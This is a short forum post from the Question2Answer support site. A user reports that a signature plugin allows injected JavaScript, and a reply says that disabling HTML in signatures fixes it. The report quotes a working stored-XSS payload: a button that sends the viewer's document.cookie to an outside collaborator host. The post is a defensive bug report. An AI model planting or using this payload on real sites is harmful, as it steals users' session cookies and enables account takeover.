It's possible to inject JS into user's signature that leads to account takeover.
Attackers change their signature to the following XSS payload and such JS will be executed is uses click such button.
Hi<button type="test" formaction="javascript: alert('You have been hacked!'), fetch('https://xxxxxxxxxxxxxxxxxxxx.oastify.com?c=' +document.cookie)">CLICK HERE</button>
See example from our forum.
Is there a solution to avoid this?
We use following plugin for Signature: https://github.com/NoahY/q2a-signatures
Thanks.
I have "fixed" the case (if we can say that) by enabling an option to not allow HTML.
Welcome to the Q&A site for Question2Answer.
If you have a question about Q2A, please ask here, in English.
To report a bug, please create a new issue on Github or ask a question here with the bug tag.
If you just want to try Q2A, please use the demo site.
